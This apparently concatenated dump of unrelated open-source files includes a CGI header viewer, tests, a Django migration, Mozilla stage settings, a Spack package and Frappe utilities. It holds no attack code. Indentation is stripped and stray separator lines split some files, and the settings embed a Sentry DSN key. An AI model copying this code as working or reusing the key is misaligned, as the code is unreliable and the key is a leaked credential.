'Specified method is invalid for this server.'),
406: ('Not Acceptable', 'URI not available in preferred format.'),
407: ('Proxy Authentication Required', 'You must authenticate with '
'this proxy before proceeding.'),
408: ('Request Time-out', 'Request timed out; try again later.'),
409: ('Conflict', 'Request conflict.'),
410: ('Gone',
'URI no longer exists and has been permanently removed.'),
411: ('Length Required', 'Client must specify Content-Length.'),
412: ('Precondition Failed', 'Precondition in headers is false.'),
413: ('Request Entity Too Large', 'Entity is too large.'),
414: ('Request-URI Too Long', 'URI is too long.'),
415: ('Unsupported Media Type', 'Entity body in unsupported format.'),
416: ('Requested Range Not Satisfiable',
'Cannot satisfy request range.'),
417: ('Expectation Failed',
'Expect condition could not be satisfied.'),
500: ('Internal error', 'Server got itself in trouble'),
501: ('Not Implemented',
'Server does not support this operation'),
502: ('Bad Gateway', 'Invalid responses from another server/proxy.'),
503: ('Service temporarily overloaded',
'The server cannot process the request due to a high load'),
504: ('Gateway timeout',
'The gateway server did not receive a timely response'),
505: ('HTTP Version not supported', 'Cannot fulfill request.')
}
################################################################
# Private functions and variables
SCRIPTNAME = os.environ.get('SCRIPT_NAME', '') # the name of the script
versionstring = '1.1.1 18th August, 2004.'
fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
METHOD = 'GET'
METHOD2 = 'POST'
def getform(valuelist, theform, notpresent=''):
"""This function, given a CGI form, extracts the data from it, based on
valuelist passed in. Any non-present values are set to '' - although this can be changed.
(e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
data = {}
for field in valuelist:
if not theform.has_key(field):
data[field] = notpresent
else:
if type(theform[field]) != type([]):
data[field] = theform[field].value
else:
values = map(lambda x: x.value, theform[field]) # allows for list type values
data[field] = values
return data
errormess = "<H1>An Error Has Occurred</H1><BR><B><PRE>"
theformhead = """<HTML><HEAD><TITLE>http.py - Playing With Headers and Cookies</TITLE></HEAD>
<BODY><CENTER>
<H1>Welcome to http.py - <BR>a Python CGI</H1>
<B><I>By Fuzzyman</B></I><BR>
"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'''.</CENTER>
<BR>'''
HR = '<BR><BR><HR><BR><BR>'
theform = """This CGI script allows you to specify a URL using the form below.<BR>
It will take a look at the specified URL and print the headers from the server.<BR>
It will also print the cookies which ought to be managed by the ClientCookie module.<BR>
<BR>
<H2>Enter the Location</H2>
<FORM METHOD=\"""" + METHOD + '" action="' + SCRIPTNAME + """\">
<input name=url type=text size=45 value=\"%s\" ><BR>
<input type=submit value="Submit"><BR>
</FORM>
<BR><BR><HR><BR><A href="http://www.voidspace.org.uk/atlantibots/pythonutils.html">Voidspace Pythonutils Page</A>
</BODY>
</HTML>
"""
authmess = """<HTML><HEAD><TITLE>Authentication Required</TITLE></HEAD>
<BODY><CENTER>
<H1>Authentication Required</H1>
<B><I>http.py By Fuzzyman</B></I><BR>
"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'''.</CENTER><BR>
<BR>Please enter your username and password below.<BR>
<FORM METHOD=\"''' + METHOD2 + '" action="' + SCRIPTNAME + """\">Username :
<input name="name" type=text><BR>Password :
<input name="pass" type=password><BR>
<input type=hidden value="%s" name="theurl">
<input type=submit value="Submit">
<BR><BR>
"""
err_mess = """<HTML><HEAD><TITLE>%s</TITLE></HEAD>
<BODY><CENTER>
<H1>%s</H1>
<H2>%s</H2>
</CENTER>"""
################################################################
# main body of the script
if __name__ == '__main__':
print "Content-type: text/html" # this is the header to the server
print # so is this blank line
form = cgi.FieldStorage()
data = getform(['url', 'name', 'pass', 'theurl'], form)
print theformhead
theurl = data['theurl'] or data['url']
if not SCRIPTNAME: theurl = 'http://www.google.com/search?hl=en&ie=UTF-8&q=hello&btnG=Google+Search'
info = 'An error occured before we got the headers.'
e = ''
if not theurl:
print theform % ''
else:
if theurl.find(':') == -1: theurl = 'http://' + theurl
try:
req = reqfun(theurl, None, {'User-agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'})
if data['name'] and data['pass']:
import base64
base64string = base64.encodestring('%s:%s' % (data['name'], data['pass']))[:-1]
req.add_header("Authorization", "Basic %s" % base64string)
u = openfun(req)
info = u.info()
except Exception, e: # an error in fetching the page
if not hasattr(e, 'code'): # Means the page doesn't exist
the_err = errorlist[404]
print err_mess % (the_err[0], the_err[0], the_err[1])
elif e.code == 401: # authentication
pr
|
thombashi/sqlitebiter | test/test_version_subcommand.py | Python | mit | 373 | 0 |
from click.testing import CliRunner
from sqlitebiter.__main__ import cmd
from sqlitebiter._const import ExitCode
from .common import print_traceback
class Test_version_subcommand:
    def test_smoke(self):
        runner = CliRunner()
        result = runner.invoke(cmd, ["version"])
        print_traceback(result)
        assert result.exit_code == ExitCode.SUCCESS
|
F483/trainlessmagazine.com | article/migrations/0020_remove_article_issue.py | Python | mit | 366 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    dependencies = [
        ('article', '0019_remove_article_ordering_featured'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='article',
            name='issue',
        ),
    ]
|
Prashant-Surya/addons-server | src/olympia/conf/stage/settings.py | Python | bsd-3-clause | 8,094 | 0 |
import logging
import os
import environ
import datetime
from olympia.lib.settings_base import * # noqa
environ.Env.read_env(env_file='/etc/olympia/settings.env')
env = environ.Env()
CDN_HOST = 'https://addons-stage-cdn.allizom.org'
CSP_FONT_SRC += (CDN_HOST,)
CSP_FRAME_SRC += ('https://www.sandbox.paypal.com',)
CSP_IMG_SRC += (CDN_HOST,)
CSP_SCRIPT_SRC += (
# Fix for discovery pane when using services subdomain.
'https://addons.allizom.org',
CDN_HOST,
)
CSP_STYLE_SRC += (CDN_HOST,)
ENGAGE_ROBOTS = False
EMAIL_URL = env.email_url('EMAIL_URL')
EMAIL_HOST = EMAIL_URL['EMAIL_HOST']
EMAIL_PORT = EMAIL_URL['EMAIL_PORT']
EMAIL_BACKEND = EMAIL_URL['EMAIL_BACKEND']
EMAIL_HOST_USER = EMAIL_URL['EMAIL_HOST_USER']
EMAIL_HOST_PASSWORD = EMAIL_URL['EMAIL_HOST_PASSWORD']
EMAIL_QA_WHITELIST = env.list('EMAIL_QA_WHITELIST')
ENV = env('ENV')
DEBUG = False
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
CRONJOB_LOCK_PREFIX = DOMAIN
API_THROTTLE = False
REDIRECT_SECRET_KEY = env('REDIRECT_SECRET_KEY')
DOMAIN = env('DOMAIN', default='addons.allizom.org')
SERVER_EMAIL = 'zstage@addons.mozilla.org'
SITE_URL = 'https://' + DOMAIN
SERVICES_URL = env('SERVICES_URL',
default='https://services.addons.allizom.org')
STATIC_URL = '%s/static/' % CDN_HOST
MEDIA_URL = '%s/user-media/' % CDN_HOST
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
SYSLOG_TAG = "http_app_addons_stage"
SYSLOG_TAG2 = "http_app_addons_stage_timer"
SYSLOG_CSP = "http_app_addons_stage_csp"
DATABASES = {}
DATABASES['default'] = env.db('DATABASES_DEFAULT_URL')
DATABASES['default']['ENGINE'] = 'django.db.backends.mysql'
# Run all views in a transaction (on master) unless they are decorated not to.
DATABASES['default']['ATOMIC_REQUESTS'] = True
# Pool our database connections up for 300 seconds
DATABASES['default']['CONN_MAX_AGE'] = 300
DATABASES['slave'] = env.db('DATABASES_SLAVE_URL')
# Do not open a transaction for every view on the slave DB.
DATABASES['slave']['ATOMIC_REQUESTS'] = False
DATABASES['slave']['ENGINE'] = 'django.db.backends.mysql'
# Pool our database connections up for 300 seconds
DATABASES['slave']['CONN_MAX_AGE'] = 300
SERVICES_DATABASE = env.db('SERVICES_DATABASE_URL')
SLAVE_DATABASES = ['slave']
CACHE_PREFIX = 'olympia.%s' % ENV
KEY_PREFIX = CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES = {}
CACHES['default'] = env.cache('CACHES_DEFAULT')
CACHES['default']['TIMEOUT'] = 500
CACHES['default']['BACKEND'] = 'caching.backends.memcached.MemcachedCache'
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
SECRET_KEY = env('SECRET_KEY')
LOG_LEVEL = logging.DEBUG
# Celery
BROKER_URL = env('BROKER_URL')
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
CELERY_RESULT_BACKEND = env('CELERY_RESULT_BACKEND')
NETAPP_STORAGE_ROOT = env(u'NETAPP_STORAGE_ROOT')
NETAPP_STORAGE = NETAPP_STORAGE_ROOT + u'/shared_storage'
GUARDED_ADDONS_PATH = NETAPP_STORAGE_ROOT + u'/guarded-addons'
MEDIA_ROOT = NETAPP_STORAGE + u'/uploads'
# Must be forced in settings because name => path can't be dynamically
# computed: reviewer_attachmentS VS reviewer_attachment.
# TODO: rename folder on file system.
# (One can also just rename the setting, but this will not be consistent
# with the naming scheme.)
REVIEWER_ATTACHMENTS_PATH = MEDIA_ROOT + '/reviewer_attachment'
LOGGING['loggers'].update({
'z.task': {'level': logging.DEBUG},
'z.redis': {'level': logging.DEBUG},
'z.pool': {'level': logging.ERROR},
})
# This is used for `django-cache-machine`
REDIS_BACKEND = env('REDIS_BACKENDS_CACHE')
REDIS_BACKENDS = {
'cache': get_redis_settings(env('REDIS_BACKENDS_CACHE')),
'cache_slave': get_redis_settings(env('REDIS_BACKENDS_CACHE_SLAVE')),
'master': get_redis_settings(env('REDIS_BACKENDS_MASTER')),
'slave': get_redis_settings(env('REDIS_BACKENDS_SLAVE'))
}
CACHE_MACHINE_USE_REDIS = True
# Old recaptcha V1
RECAPTCHA_PUBLIC_KEY = env('RECAPTCHA_PUBLIC_KEY')
RECAPTCHA_PRIVATE_KEY = env('RECAPTCHA_PRIVATE_KEY')
# New Recaptcha V2
NOBOT_RECAPTCHA_PUBLIC_KEY = env('NOBOT_RECAPTCHA_PUBLIC_KEY')
NOBOT_RECAPTCHA_PRIVATE_KEY = env('NOBOT_RECAPTCHA_PRIVATE_KEY')
TMP_PATH = os.path.join(NETAPP_STORAGE, u'tmp')
PACKAGER_PATH = os.path.join(TMP_PATH, 'packager')
ADDONS_PATH = NETAPP_STORAGE_ROOT + u'/files'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = env('RESPONSYS_ID')
ES_TIMEOUT = 60
ES_HOSTS = env('ES_HOSTS')
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_%s' % (v, ENV)) for k, v in ES_INDEXES.items())
STATSD_HOST = env('STATSD_HOST')
STATSD_PREFIX = env('STATSD_PREFIX')
GRAPHITE_HOST = env('GRAPHITE_HOST')
GRAPHITE_PREFIX = env('GRAPHITE_PREFIX')
CEF_PRODUCT = STATSD_PREFIX
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing.stage.mozaws.net/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
ADDONS_LINTER_BIN = 'addons-linter'
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
GOOGLE_ANALYTICS_CREDENTIALS = env.dict('GOOGLE_ANALYTICS_CREDENTIALS')
GOOGLE_ANALYTICS_CREDENTIALS['user_agent'] = None
GOOGLE_ANALYTICS_CREDENTIALS['token_expiry'] = datetime.datetime(2013, 1, 3, 1, 20, 16, 45465) # noqa
GOOGLE_API_CREDENTIALS = env('GOOGLE_API_CREDENTIALS')
GEOIP_URL = 'https://geo.services.mozilla.com'
AES_KEYS = env.dict('AES_KEYS')
PERSONA_DEFAULT_PAGES = 5
# Signing
SIGNING_SERVER = env('SIGNING_SERVER')
PRELIMINARY_SIGNING_SERVER = env('PRELIMINARY_SIGNING_SERVER')
# sandbox
PAYPAL_PAY_URL = 'https://svcs.sandbox.paypal.com/AdaptivePayments/'
PAYPAL_FLOW_URL = (
'https://www.sandbox.paypal.com/webapps/adaptivepayment/flow/pay')
PAYPAL_API_URL = 'https://api-3t.sandbox.paypal.com/nvp'
PAYPAL_EMAIL = env('PAYPAL_EMAIL')
PAYPAL_APP_ID = env('PAYPAL_APP_ID')
PAYPAL_PERMISSIONS_URL = 'https://svcs.sandbox.paypal.com/Permissions/'
PAYPAL_CGI_URL = 'https://www.sandbox.paypal.com/cgi-bin/webscr'
PAYPAL_EMBEDDED_AUTH = {
'USER': env('PAYPAL_EMBEDDED_AUTH_USER'),
'PASSWORD': env('PAYPAL_EMBEDDED_AUTH_PASSWORD'),
'SIGNATURE': env('PAYPAL_EMBEDDED_AUTH_SIGNATURE'),
}
PAYPAL_CGI_AUTH = {
'USER': env('PAYPAL_CGI_AUTH_USER'),
'PASSWORD': env('PAYPAL_CGI_AUTH_PASSWORD'),
'SIGNATURE': env('PAYPAL_CGI_AUTH_SIGNATURE'),
}
PAYPAL_CHAINS = (
(30, env('PAYPAL_CHAINS_EMAIL')),
)
SENTRY_DSN = env('SENTRY_DSN')
AMO_LANGUAGES = AMO_LANGUAGES + ('dbg',)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
GOOGLE_ANALYTICS_DOMAIN = 'addons.mozilla.org'
NEWRELIC_ENABLE = env.bool('NEWRELIC_ENABLE', default=False)
if NEWRELIC_ENABLE:
NEWRELIC_INI = '/etc/newrelic.d/%s.ini' % DOMAIN
FXA_CONFIG = {
'default': {
'client_id': env('FXA_CLIENT_ID'),
'client_secret': env('FXA_CLIENT_SECRET'),
'content_host': 'https://accounts.firefox.com',
'oauth_host': 'https://oauth.accounts.firefox.com/v1',
'profile_host': 'https://profile.accounts.firefox.com/v1',
'redirect_url':
'https://addons.allizom.org/api/v3/accounts/authorize/',
'scope': 'profile',
},
'internal': {
'client_id': env('INTERNAL_FXA_CLIENT_ID'),
'client_secret': env('INTERNAL_FXA_CLIENT_SECRET'),
'content_host': 'https://accounts.firefox.com',
'oauth_host': 'https://oauth.accounts.firefox.com/v1',
'profile_host': 'https://profile.accounts.firefox.com/v1',
'redirect_url':
'https://addons.allizom.org/api/v3/accounts/authorize/',
'scope': 'profile',
},
}
INTERNAL_DOMAINS = ['addons-admin.stage.mozaws.net']
for regex, overrides in CORS_ENDPOINT_OVERRIDES:
overrides['CORS_ORIGIN_WHITELIST'] = INTERNAL_DOMAINS
READ_ONLY = env.bool('READ_ONLY', default=False)
RAVEN_DSN = (
'https://e35602be5252460d97587478bcc642df@sentry.prod.mozaws.net/77')
RAVEN_WHITELIST = ['addons.allizom.org', 'addons-cdn.allizom.org']
|
gstiebler/odemis | src/odemis/acq/align/test/find_overlay_test.py | Python | gpl-2.0 | 3,688 | 0.003526 |
# -*- coding: utf-8 -*-
'''
Created on 19 Dec 2013
@author: Kimon Tsitsikas
Copyright © 2012-2013 Kimon Tsitsikas, Delmic
This file is part of Odemis.
Odemis is free software: you can redistribute it and/or modify it under the terms
of the GNU General Public License version 2 as published by the Free Software
Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
Odemis. If not, see http://www.gnu.org/licenses/.
'''
from concurrent import futures
import logging
from odemis import model
import odemis
from odemis.acq import align
from odemis.util import test
import os
import time
import unittest
# logging.basicConfig(format=" - %(levelname)s \t%(message)s")
logging.getLogger().setLevel(logging.DEBUG)
# _frm = "%(asctime)s %(levelname)-7s %(module)-15s: %(message)s"
# logging.getLogger().handlers[0].setFormatter(logging.Formatter(_frm))
CONFIG_PATH = os.path.dirname(odemis.__file__) + "/../../install/linux/usr/share/odemis/"
SECOM_LENS_CONFIG = CONFIG_PATH + "sim/secom-sim-lens-align.odm.yaml" # 4x4
class TestOverlay(unittest.TestCase):
"""
Test Overlay functions
"""
backend_was_running = False
@classmethod
def setUpClass(cls):
try:
test.start_backend(SECOM_LENS_CONFIG)
except LookupError:
logging.info("A running backend is already found, skipping tests")
cls.backend_was_running = True
return
except IOError as exp:
logging.error(str(exp))
raise
# find components by their role
cls.ebeam = model.getComponent(role="e-beam")
cls.sed = model.getComponent(role="se-detector")
cls.ccd = model.getComponent(role="ccd")
cls.light = model.getComponent(role="light")
cls.light_filter = model.getComponent(role="filter")
@classmethod
def tearDownClass(cls):
if cls.backend_was_running:
return
test.stop_backend()
def setUp(self):
if self.backend_was_running:
self.skipTest("Running backend found")
# @unittest.skip("skip")
def test_find_overlay(self):
"""
Test FindOverlay
"""
f = align.FindOverlay((4, 4), 0.1, 10e-06, self.ebeam, self.ccd, self.sed, skew=True)
t, (opt_md, sem_md) = f.result()
self.assertEqual(len(t), 5)
self.assertIn(model.MD_PIXEL_SIZE_COR, opt_md)
self.assertIn(model.MD_SHEAR_COR, sem_md)
# @unittest.skip("skip")
def test_find_overlay_failure(self):
"""
|
Test FindOverlay failure due to low maximum allowed difference
"""
f = align.FindOverlay((6, 6), 1e-6, 1e-08, self.ebeam, self.ccd, self.sed, skew=True)
with self.assertRaises(ValueError):
f.result()
# @unittest.skip("skip")
def test_find_overlay_cancelled(self):
"""
Test FindOverlay cancellation
"""
|
f = align.FindOverlay((6, 6), 10e-06, 1e-07, self.ebeam, self.ccd, self.sed, skew=True)
time.sleep(0.04) # Cancel almost after the half grid is scanned
f.cancel()
self.assertTrue(f.cancelled())
self.assertTrue(f.done())
with self.assertRaises(futures.CancelledError):
f.result()
if __name__ == '__main__':
unittest.main()
# suite = unittest.TestLoader().loadTestsFromTestCase(TestOverlay)
# unittest.TextTestRunner(verbosity=2).run(suite)
|
rspavel/spack | var/spack/repos/builtin/packages/py-colorpy/package.py | Python | lgpl-2.1 | 902 | 0.002217 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyColorpy(PythonPackage):
"""ColorPy is a Python package to convert physical descriptions of light -
spectra of light intensity vs. wavelength - into RGB colors that can be
drawn on a computer screen. It provides a nice set of attractive plots
that you can make of such spectra, and some other color related
functions as well.
"""
homepage = "http://markkness.net/colorpy/ColorPy.html"
url = "https://pypi.io/packages/source/c/colorpy/colorpy-0.1.1.tar.gz"
version('0.1.1', sha256='e400a7e879adc83c6098dde13cdd093723f3936778c245b1caf88f5f1411170d')
depends_on('py-numpy', type='run')
depends_on('py-matplotlib', type='run')
|
j0gurt/ggrc-core | src/ggrc/models/clause.py | Python | apache-2.0 | 1,804 | 0.006652 |
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Module for Clause model."""
from ggrc import db
from ggrc.models.mixins import CustomAttributable
from ggrc.models.deferred import deferred
from ggrc.models.mixins import Described
from ggrc.models.mixins import Hierarchical
from ggrc.models.mixins import Hyperlinked
from ggrc.models.mixins import Noted
from ggrc.models.mixins import Slugged
from ggrc.models.mixins import Stateful
from ggrc.models.mixins import Timeboxed
from ggrc.models.mixins import Titled
from ggrc.models.mixins import WithContact
from ggrc.models.object_owner import Ownable
from ggrc.models.object_person import Personable
from ggrc.models.relationship import Relatable
from ggrc.models.track_object_state import HasObjectState
from ggrc.models.track_object_state import track_state_for_class
class Clause(HasObjectState, Hierarchical, Noted, Described, Hyperlinked,
WithContact, Titled, Stateful, CustomAttributable,
Personable, Ownable, Timeboxed, Relatable, Slugged, db.Model):
VALID_STATES = [
'Draft',
'Final',
'Effective',
'Ineffective',
'Launched',
'Not Launched',
'In Scope',
'Not in Scope',
'Deprecated',
]
__tablename__ = 'clauses'
_table_plural = 'clauses'
_title_uniqueness = True
_aliases = {
"url": "Clause URL",
"description": "Text of Clause",
"directive": None,
}
# pylint: disable=invalid-name
na = deferred(db.Column(db.Boolean, default=False, nullable=False),
'Clause')
notes = deferred(db.Column(db.Text), 'Clause')
_publish_attrs = [
'na',
'notes',
]
_sanitize_html = ['notes']
_include_links = []
track_state_for_class(Clause)
|
paurosello/frappe | frappe/modules/utils.py | Python | mit | 7,994 | 0.026395 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
"""
Utilities for using modules
"""
import frappe, os, json
import frappe.utils
from frappe import _
def export_module_json(doc, is_standard, module):
"""Make a folder for the given doc and add its json file (make it a standard
object that will be synced)"""
if (not frappe.flags.in_import and getattr(frappe.get_conf(),'developer_mode', 0)
and is_standard):
from frappe.modules.export_file import export_to_files
# json
export_to_files(record_list=[[doc.doctype, doc.name]], record_module=module,
create_init=is_standard)
path = os.path.join(frappe.get_module_path(module), scrub(doc.doctype),
scrub(doc.name), scrub(doc.name))
return path
def get_doc_module(module, doctype, name):
"""Get custom module for given document"""
module_name = "{app}.{module}.{doctype}.{name}.{name}".format(
app = frappe.local.module_app[scrub(module)],
doctype = scrub(doctype),
module = scrub(module),
name = scrub(name)
)
return frappe.get_module(module_name)
@frappe.whitelist()
def export_customizations(module, doctype, sync_on_migrate=0, with_permissions=0):
"""Export Custom Field and Property Setter for the current document to the app folder.
This will be synced with bench migrate"""
if not frappe.get_conf().developer_mode:
raise Exception('Not developer mode')
custom = {'custom_fields': [], 'property_setters': [], 'custom_perms': [],
'doctype': doctype, 'sync_on_migrate': 1}
def add(_doctype):
custom['custom_fields'] += frappe.get_all('Custom Field',
fields='*', filters={'dt': _doctype})
custom['property_setters'] += frappe.get_all('Property Setter',
fields='*', filters={'doc_type': _doctype})
add(doctype)
if with_permissions:
custom['custom_perms'] = frappe.get_all('Custom DocPerm',
fields='*', filters={'parent': doctype})
# also update the custom fields and property setters for all child tables
for d in frappe.get_meta(doctype).get_table_fields():
export_customizations(module, d.options, sync_on_migrate, with_permissions)
if custom["custom_fields"] or custom["property_setters"] or custom["custom_perms"]:
folder_path = os.path.join(get_module_path(module), 'custom')
if not os.path.exists(folder_path):
os.makedirs(folder_path)
path = os.path.join(folder_path, scrub(doctype)+ '.json')
with open(path, 'w') as f:
f.write(frappe.as_json(custom))
frappe.msgprint(_('Customizations for <b>{0}</b> exported to:<br>{1}').format(doctype,path))
def sync_customizations(app=None):
'''Sync custom fields and property setters from custom folder in each app module'''
if app:
apps = [app]
else:
apps = frappe.get_installed_apps()
for app_name in apps:
for module_name in frappe.local.app_modules.get(app_name) or []:
folder = frappe.get_app_path(app_name, module_name, 'custom')
if os.path.exists(folder):
for fname in os.listdir(folder):
with open(os.path.join(folder, fname), 'r') as f:
data = json.loads(f.read())
if data.get('sync_on_migrate'):
sync_customizations_for_doctype(data, folder)
def sync_customizations_for_doctype(data, folder):
'''Sync doctype customizations for a particular data set'''
from frappe.core.doctype.doctype.doctype import validate_fields_for_doctype
doctype = data['doctype']
update_schema = False
def sync(key, custom_doctype, doctype_fieldname):
doctypes = list(set(map(lambda row: row.get(doctype_fieldname), data[key])))
# sync single doctype excluding the child doctype
def sync_single_doctype(doc_type):
frappe.db.sql('delete from `tab{0}` where `{1}` =%s'.format(
custom_doctype, doctype_fieldname), doc_type)
for d in data[key]:
if d.get(doctype_fieldname) == doc_type:
d['doctype'] = custom_doctype
doc = frappe.get_doc(d)
doc.db_insert()
for doc_type in doctypes:
# only sync the parent doctype and child doctype if there isn't any other child table json file
if doc_type == doctype or not os.path.exists(os.path.join(folder, frappe.scrub(doc_type)+".json")):
sync_single_doctype(doc_type)
if data['custom_fields']:
sync('custom_fields', 'Custom Field', 'dt')
update_schema = True
if data['property_setters']:
sync('property_setters', 'Property Setter', 'doc_type')
if data.get('custom_perms'):
sync('custom_perms', 'Custom DocPerm', 'parent')
print('Updating customizations for {0}'.format(doctype))
validate_fields_for_doctype(doctype)
if update_schema and not frappe.db.get_value('DocType', doctype, 'issingle'):
from frappe.model.db_schema import updatedb
updatedb(doctype)
def scrub(txt):
return frappe.scrub(txt)
def scrub_dt_dn(dt, dn):
"""Returns in lowercase and code friendly names of doctype and name for certain types"""
return scrub(dt), scrub(dn)
def get_module_path(module):
"""Returns path of the given module"""
return frappe.get_module_path(module)
def get_doc_path(module, doctype, name):
dt, dn = scrub_dt_dn(doctype, name)
return os.path.join(get_module_path(module), dt, dn)
def reload_doc(module, dt=None, dn=None, force=False, reset_permissions=False):
from frappe.modules.import_file import import_files
return import_files(module, dt, dn, force=force, reset_permissions=reset_permissions)
def export_doc(doctype, name, module=None):
"""Write a doc to standard path."""
from frappe.modules.export_file import write_document_file
print(doctype, name)
if not module: module = frappe.db.get_value('DocType', name, 'module')
write_document_file(frappe.get_doc(doctype, name), module)
def get_doctype_module(doctype):
"""Returns **Module Def** name of given doctype."""
def make_modules_dict():
return dict(frappe.db.sql("select name, module from tabDocType"))
return frappe.cache().get_value("doctype_modules", make_modules_dict)[doctype]
doctype_python_modules = {}
def load_doctype_module(doctype, module=None, prefix="", suffix=""):
"""Returns the module object for given doctype."""
if not module:
module = get_doctype_module(doctype)
app = get_module_app(module)
key = (app, doctype, prefix, suffix)
module_name = get_module_name(doctype, module, prefix, suffix)
try:
if key not in doctype_python_modules:
doctype_python_modules[key] = frappe.get_module(module_name)
except ImportError as e:
raise ImportError('Module import failed for {0} ({1})'.format(doctype, module_name + ' Error: ' + str(e)))
return doctype_python_modules[key]
def get_module_name(doctype, module, prefix="", suffix="", app=None):
return '{app}.{module}.doctype.{doctype}.{prefix}{doctype}{suffix}'.format(\
app = scrub(app or get_module_app(module)),
module = scrub(module),
doctype = scrub(doctype),
prefix=prefix,
suffix=suffix)
def get_module_app(module):
return frappe.local.module_app[scrub(module)]
def get_app_publisher(module):
app = frappe.local.module_app[scrub(module)]
if not app:
frappe.throw(_("App not found"))
app_publisher = frappe.get_hooks(hook="app_publisher", app_name=app)[0]
return app_publisher
def make_boilerplate(template, doc, opts=None):
target_path = get_doc_path(doc.module, doc.doctype, doc.name)
template_name = template.replace("controller", scrub(doc.name))
if template_name.endswith('._py'):
template_name = template_name[:-4] + '.py'
target_file_path = os.path.join(target_path, template_name)
if not doc: doc = {}
app_publisher = get_app_publisher(doc.module)
if not os.path.exists(target_file_path):
if not opts:
opts = {}
with open(target_file_path, 'w') as target:
with open(os.path.join(get_module_path("core"), "doctype", scrub(doc.doctype),
"boilerplate", template), 'r') as source:
target.write(frappe.utils.encode(
frappe.utils.cstr(source.read()).format(
app_publisher=app_publisher,
year=frappe.utils.nowdate()[:4],
classname=doc.name.replace(" ", ""),
doctype=doc.name, **opts)
))
|
devendermishrajio/nova_test_latest
|
nova/tests/unit/objects/test_block_device.py
|
Python
|
apache-2.0
| 16,751
| 0.00006
|
# Copyright 2013 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import six
from nova.cells import rpcapi as cells_rpcapi
from nova import context
from nova import db
from nova import exception
from nova import objects
from nova.objects import block_device as block_device_obj
from nova import test
from nova.tests.unit import fake_block_device
from nova.tests.unit import fake_instance
from nova.tests.unit.objects import test_objects
class _TestBlockDeviceMappingObject(object):
def fake_bdm(self, instance=None):
instance = instance or {}
fake_bdm = fake_block_device.FakeDbBlockDeviceDict({
'id': 123,
'instance_uuid': instance.get('uuid') or 'fake-instance',
'device_name': '/dev/sda2',
'source_type': 'snapshot',
'destination_type': 'volume',
|
'connection_info': "{'fake': 'connection_info'}",
'snapshot_id': 'fake-snapshot-id-1',
'boot_index': -1
})
if instance:
            fake_bdm['instance'] = instance
return fake_bdm
def _test_save(self, cell_type=None):
if cell_type:
self.flags(enable=True, cell_type=cell_type, group='cells')
else:
self.flags(enable=False, group='cells')
fake_bdm = self.fake_bdm()
with test.nested(
mock.patch.object(
db, 'block_device_mapping_update', return_value=fake_bdm),
mock.patch.object(
cells_rpcapi.CellsAPI, 'bdm_update_or_create_at_top')
) as (bdm_update_mock, cells_update_mock):
bdm_object = objects.BlockDeviceMapping(context=self.context)
bdm_object.id = 123
bdm_object.volume_id = 'fake_volume_id'
bdm_object.save()
bdm_update_mock.assert_called_once_with(
self.context, 123, {'volume_id': 'fake_volume_id'},
legacy=False)
if cell_type != 'compute':
self.assertFalse(cells_update_mock.called)
else:
self.assertEqual(1, cells_update_mock.call_count)
self.assertTrue(len(cells_update_mock.call_args[0]) > 1)
self.assertIsInstance(cells_update_mock.call_args[0][1],
block_device_obj.BlockDeviceMapping)
self.assertEqual(cells_update_mock.call_args[1], {})
def test_save_nocells(self):
self._test_save()
def test_save_apicell(self):
self._test_save(cell_type='api')
def test_save_computecell(self):
self._test_save(cell_type='compute')
def test_save_instance_changed(self):
bdm_object = objects.BlockDeviceMapping(context=self.context)
bdm_object.instance = objects.Instance()
self.assertRaises(exception.ObjectActionError,
bdm_object.save)
@mock.patch.object(db, 'block_device_mapping_update', return_value=None)
def test_save_not_found(self, bdm_update):
bdm_object = objects.BlockDeviceMapping(context=self.context)
bdm_object.id = 123
self.assertRaises(exception.BDMNotFound, bdm_object.save)
@mock.patch.object(db, 'block_device_mapping_get_by_volume_id')
def test_get_by_volume_id(self, get_by_vol_id):
get_by_vol_id.return_value = self.fake_bdm()
